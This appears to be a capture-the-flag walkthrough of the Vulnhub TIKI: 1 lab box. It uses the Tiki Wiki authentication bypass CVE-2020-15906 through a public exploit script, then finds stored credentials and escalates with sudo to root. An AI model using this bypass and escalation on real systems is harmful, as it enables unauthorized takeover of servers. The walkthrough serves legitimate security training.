Vulnhub - TIKI: 1 | An ordinary day

Introduction

Oh no our webserver got compromised. The attacker used an 0day, so we dont know how he got into the admin panel. Investigate that.
This is an OSCP Prep Box, its based on a CVE I recently found. Its on the OSCP lab machines level.

This box is on the NetSecFocus Admin list of OSCP-like machines. It’s TIKI: 1 from vulnhub.

Ports

Ports are SSH, HTTP and SMB (139 and 445) but given the introduction it sounds like the webserver is our target. Also, nmap said:

80/tcp open http syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu)) | http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
| http-robots.txt: 1 disallowed entry
|_/tiki/

Let’s start there.

TIKI

Tiki is tiki wiki and it’s not hard to find the recent CVE for it; CVE-2020-15906, made by the machine creator. Reckon it’s what we want?

Searchsploit

It’s on searchsploit:

Tiki Wiki CMS Groupware 21.1 - Authentication Bypass php/webapps/48927.py

We can mirror this and run it:

root@kali:/opt/vulnhub/tiki# python3 48927.py 192.168.1.168
Admin Password got removed.
Use BurpSuite to login into admin without a password

The vulnerability is that an attacker is able to brute-force a Tiki Wiki admin account until it is locked after 50 invalid login attempts. They can then use an empty password to authenticate as the administrator and gain full account access.

The webpage won’t allow you to leave the password field blank, but it’s fine with Burpsuite so that’s where it comes in. Then you can do show response in browser and we are logged in as admin.

Enumerate

I looked around for a way to upload a shell, but there doesn’t appear to be one (that I could find). I could upload a shell as a ZIP and unzip it, but could only download the resulting file and not run it. Fortunately our box user has left his credentials on the site to find.

http://192.168.1.168/tiki/tiki-index.php?page=Credentials

Privesc

We can SSH in as our user, and then he is a sudoer so it’s all over:

silky@ubuntu:~$ sudo -l
[sudo] Passwort für silky: 
Passende Defaults-Einträge für silky auf ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

Der Benutzer silky darf die folgenden Befehle auf ubuntu ausführen:
    (ALL : ALL) ALL
silky@ubuntu:~$ sudo su
root@ubuntu:/home/silky# cd /root
root@ubuntu:~# ls -lash
root@ubuntu:~# cat flag.txt 

ASCII art removed
                                                    
You did it ^^
I hope you had fun.
Share your flag with me on Twitter: S1lky_1337


flag:88d8120f434c3b4221937a8cd0668588
root@ubuntu:~# id;hostname
uid=0(root) gid=0(root) Gruppen=0(root)
ubuntu

BTW; Google translate says:

Der Benutzer silky darf die folgenden Befehle auf ubuntu ausführen

means

The user silky is allowed to execute the following commands on ubuntu